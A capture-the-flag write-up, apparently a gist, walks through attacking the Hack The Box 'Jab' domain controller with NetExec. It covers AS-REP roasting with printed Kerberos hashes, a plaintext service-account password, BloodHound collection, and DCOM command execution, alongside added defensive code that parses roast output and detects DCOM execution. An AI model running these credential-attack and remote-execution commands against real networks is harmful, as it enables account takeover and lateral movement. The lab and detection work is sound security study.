@mpgn
Last active July 8, 2024 17:49

Jab vs NetExec

This writeup only highlights the parts of @0xdf's writeup that can be done with NetExec instead of another tool :)

This is not a full writeup of the Jab machine! The DCOM bug fix is not yet fully merged into main!

Thanks to @ippsec for the bug report on the mmcexec method!

1. SMB - TCP 445

```
┌──(kali㉿kali)-[~/NetExec]
└─$ ~/.local/bin/poetry run netexec smb jab.htb
SMB         10.129.230.215  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
```
2. ASREP Roast

```
┌──(kali㉿kali)-[~/NetExec]
└─$ ~/.local/bin/poetry run netexec ldap jab.htb -u /tmp/users -p '' --asreproast /tmp/hash
SMB         10.129.230.215  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
LDAP        10.129.230.215  445    DC01             $krb5asrep$23$jmontgomery@JAB.HTB:a19f5d234e79c8e58673d2b92201cf22$ccb19577eec9985e7f8d0b3969bc2153fefa0b89b5359a3f238111d9b01bdf64c057781e8ea2fa6c02d0e1eb161353c1841710fc8f9e860f243487d0b6d098b92ff7e58348d3d886f7375665239297f6180dd9c7e770942da229cc34668e838dd76d9a8abb67ca405c1f22e81920d61615a810938991c4ebf6431c869fc9aede90affe5de5e71fcbab44ece2cd88536b9e2ae9188d20c75235ddf6588ccedcaf566e4d8945d71ba64002fed401e28dc25babb88d04aebf2a136b65f48242b0cd9e0c23fa3c1abeb91e03014a6e58239e33e0e00dadb6043c4e25d77afacd318b6d78
LDAP        10.129.230.215  445    DC01             $krb5asrep$23$lbradford@JAB.HTB:a77e1457dbd922dac720a4ab33c17923$6f735d4ea68839ca36112d49d1553126ad1603a44471d2b6d2871f8f5f7967cc894478b5d3a7a47ee7bd68eb6c80818dc4f2abfe771a8cda9cb70b14fff3311c01895d2aa3ccb4e6bf8f208bbe093e4c2cef6e9f113596428372dd41593370822979aa7770c2806838527919a0112252b1a68857062fd3da9e6caf06dc01967268f4c7d509440b398a274737de2fe3cda3978dbeebd050a8af5dc8ca8e3865e613f3ebb99c6fb8e015c2af9f8a0ad28788c1c9d5b165659b49e1f133e761a845ad2a10fd718679196edba1ff87dadc904f8f16516b5d20c497f789d507ff848f2f54
LDAP        10.129.230.215  445    DC01             $krb5asrep$23$mlowe@JAB.HTB:6061fe22f16d57efed5a86a7ada716e3$b2721256a257a57754eddde4de38d513b1d0c8e794258bdd9f5b6a0239340cfad9851084a4f9a07df1adedf6824a968f74a9addae0404ef269e7c13502392901cc5c80a16bbcdbc57129d643b1a3e080a2c62552efa925ce84f231f3b26bb97913d4e03b1423bec0bcea7fbaa10385b999daa445170b9366b810cdf50347feaef57bdce3d154d7d104a9cf66cb2062d25d454af4674feb62eae1b694bf04f2a86275dbebc406c7d1591956a7b6db8d7b0f09e30676b27c13b02625f3a70f3c5b025ea6f0be5e290ff38e65cc3d1767f28174570389f6f4f9fd6b227012402f743e2a
```
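The `$krb5asrep$23$...` lines above are the hashcat 18200 layout: `$krb5asrep$<etype>$<user>@<REALM>:<checksum hex>$<encrypted-data hex>`, where etype 23 is RC4-HMAC. From a defender's side the useful thing to pull out of that output is the list of accounts it proves have Kerberos pre-authentication disabled (the `DONT_REQ_PREAUTH` UAC flag), since each of them is an offline-crackable hash until the flag is cleared. The parser below is an added example, not NetExec's code; the output it consumes is constructed with shortened hex and a fake domain, and the only assumption about the real format is the layout shown on this page.

```python
"""Parse AS-REP roast hashes as printed by NetExec's --asreproast option.

Added example (not NetExec code). Line format, as shown on the page:
    $krb5asrep$<etype>$<user>@<REALM>:<checksum_hex>$<edata_hex>
The SAMPLE output below is constructed (shortened hex), not a real capture.
"""
import re
from dataclasses import dataclass

# Hashcat mode 18200 layout. The checksum is always 16 bytes (32 hex chars);
# the encrypted part is variable length but must encode whole bytes.
ASREP_RE = re.compile(
    r"\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@:\s]+)@(?P<realm>[^:\s]+)"
    r":(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)


@dataclass(frozen=True)
class AsRepHash:
    etype: int
    user: str
    realm: str
    checksum: str
    edata: str

    @property
    def principal(self) -> str:
        return f"{self.user}@{self.realm}"


def parse_asrep_line(line: str):
    """Return an AsRepHash for one NetExec output line, or None when the line
    carries no hash (protocol banner, auth result) or the hash is malformed."""
    m = ASREP_RE.search(line.strip())
    if m is None:
        return None
    if len(m["edata"]) % 2:          # odd hex length cannot be whole bytes
        return None
    return AsRepHash(int(m["etype"]), m["user"], m["realm"],
                     m["checksum"].lower(), m["edata"].lower())


def accounts_without_preauth(output: str) -> list:
    """Sorted principals whose AS-REP was obtained without pre-authentication.

    Every one of these has DONT_REQ_PREAUTH set; the remediation is to clear
    that flag (or, where an application needs it, enforce a long random
    password and AES-only encryption types so etype 23 is not offered)."""
    found = {}
    for line in output.splitlines():
        h = parse_asrep_line(line)
        if h is not None:
            found[h.principal] = h
    return sorted(found)


# Constructed sample output in the same shape as the page's NetExec output.
# The hex values are deliberately short placeholders; the last line has an
# odd-length encrypted part and is rejected as malformed.
SAMPLE = """\
SMB         10.0.0.5  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:example.htb) (signing:True) (SMBv1:False)
LDAP        10.0.0.5  445    DC01             $krb5asrep$23$alice@EXAMPLE.HTB:0123456789abcdef0123456789abcdef$deadbeefcafe
LDAP        10.0.0.5  445    DC01             $krb5asrep$23$bob@EXAMPLE.HTB:ffffffffffffffffffffffffffffffff$00112233
LDAP        10.0.0.5  445    DC01             $krb5asrep$23$mallory@EXAMPLE.HTB:00000000000000000000000000000000$abc
"""

if __name__ == "__main__":
    for principal in accounts_without_preauth(SAMPLE):
        print("pre-auth disabled:", principal)
```

On a real engagement the same function can be pointed at the saved NetExec log under `~/.nxc/logs/` to turn the roast output straight into a remediation list for the domain admins.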
3. Shell as svc_openfire

```
┌──(kali㉿kali)-[~/NetExec]
└─$ ~/.local/bin/poetry run netexec smb jab.htb -u svc_openfire -p '!@#$%^&*(1qazxsw'
SMB         10.129.230.215  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.129.230.215  445    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw
```
4. Bloodhound

```
┌──(kali㉿kali)-[~/NetExec]
└─$ ~/.local/bin/poetry run netexec ldap jab.htb -u svc_openfire -p '!@#$%^&*(1qazxsw' --bloodhound
SMB         10.129.230.215  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.230.215  636    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw
LDAPS       10.129.230.215  636    DC01             Resolved collection methods: group, trusts, localadmin, session
LDAP        10.129.230.215  389    DC01             [-] Could not find a domain controller. Consider specifying a domain and/or DNS server.
```

Adding the DNS server option and the All collection method (running with the --debug option is recommended):

```
┌──(kali㉿kali)-[~/NetExec]
└─$ ~/.local/bin/poetry run netexec ldap jab.htb -u svc_openfire -p '!@#$%^&*(1qazxsw' --bloodhound --dns-server 10.129.230.215 --collection All
SMB         10.129.230.215  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.230.215  636    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw
LDAPS       10.129.230.215  636    DC01             Resolved collection methods: rdp, objectprops, psremote, container, acl, group, localadmin, session, trusts, dcom
LDAP        10.129.230.215  389    DC01             Done in 03M 05S
LDAPS       10.129.230.215  636    DC01             Compressing output into /home/kali/.nxc/logs/DC01_10.129.230.215_2024-06-30_175135_bloodhound.zip
```
5. DCOM Execution

Thanks to @ippsec, an issue with DCOM has been resolved :) Run ping to test, with tcpdump listening in another terminal.

```
┌──(kali㉿kali)-[~/NetExec]
└─$ ~/.local/bin/poetry run netexec smb 10.129.230.215 -u svc_openfire -p '!@#$%^&*(1qazxsw' -x 'ping 10.10.14.2' --exec-method mmcexec --no-output
SMB         10.129.230.215  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.129.230.215  445    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw
SMB         10.129.230.215  445    DC01             [+] Executed command via mmcexec
```

[image]
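The page only shows the attacker's side of the mmcexec method (tcpdump seeing the ping). On the target, that kind of DCOM-based execution leaves a process-tree signature a SOC can alert on. The detection sketch below is an added example, not NetExec code, and the chain it looks for is an assumption about how the MMC20.Application DCOM object runs a command: DCOM activation starts `mmc.exe` with the `-Embedding` switch (under the DcomLaunch `svchost.exe`), and the shell-execute call then spawns `cmd.exe` as a child of that `mmc.exe`. The event records are constructed in a simplified Sysmon Event ID 1 / Security 4688 shape (pid, parent pid, image, command line); a real deployment would feed it the actual process-creation events.

```python
"""Detection sketch for DCOM (MMC20.Application) command execution.

Added example, not NetExec code. Assumed host-side chain for the mmcexec
method: svchost.exe (DcomLaunch) -> mmc.exe -Embedding -> cmd.exe <command>.
All events below are constructed, simplified process-creation records.
"""
from collections import namedtuple

# Minimal subset of a process-creation event (Sysmon ID 1 / Security 4688).
Proc = namedtuple("Proc", "pid ppid image cmdline")

SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_dcom_mmc_exec(events) -> list:
    """Return one finding per shell process whose parent is an mmc.exe that
    was started for DCOM embedding. A benign, interactively opened MMC
    console (no -Embedding switch) spawning a shell is not reported.

    Each finding records the shell's pid and command line, the mmc.exe pid,
    and whether the grandparent is the DcomLaunch service host, which raises
    confidence that the activation came in over the network."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if _basename(e.image) not in SHELLS:
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or _basename(parent.image) != "mmc.exe":
            continue
        if "-embedding" not in parent.cmdline.lower():
            continue
        grandparent = by_pid.get(parent.ppid)
        via_dcomlaunch = (grandparent is not None
                          and "dcomlaunch" in grandparent.cmdline.lower())
        hits.append({
            "pid": e.pid,
            "cmdline": e.cmdline,
            "mmc_pid": parent.pid,
            "via_dcomlaunch": via_dcomlaunch,
        })
    return hits


# Constructed events: one DCOM-style execution of the page's ping command,
# plus an interactive Event Viewer session that also spawns cmd.exe and must
# not be flagged.
EVENTS = [
    Proc(700, 600, r"C:\Windows\System32\svchost.exe",
         "svchost.exe -k DcomLaunch -p"),
    Proc(4100, 700, r"C:\Windows\System32\mmc.exe",
         r"C:\Windows\system32\mmc.exe -Embedding"),
    Proc(4212, 4100, r"C:\Windows\System32\cmd.exe",
         "cmd.exe /c ping 10.10.14.2"),
    Proc(5000, 1200, r"C:\Windows\System32\mmc.exe",
         r'"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"'),
    Proc(5010, 5000, r"C:\Windows\System32\cmd.exe",
         "cmd.exe /c whoami"),
]

if __name__ == "__main__":
    for hit in find_dcom_mmc_exec(EVENTS):
        print("DCOM mmc exec:", hit)
```

Pair the host alert with the network side the page already shows: an inbound DCOM activation (TCP 135 followed by a high dynamic port) from a workstation that has no business using MMC remotely, against a host where this tree appears, is a strong lateral-movement signal. Restricting DCOM launch permissions and blocking inbound RPC from user subnets removes the method entirely.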

Et voilà! Peace ✌️
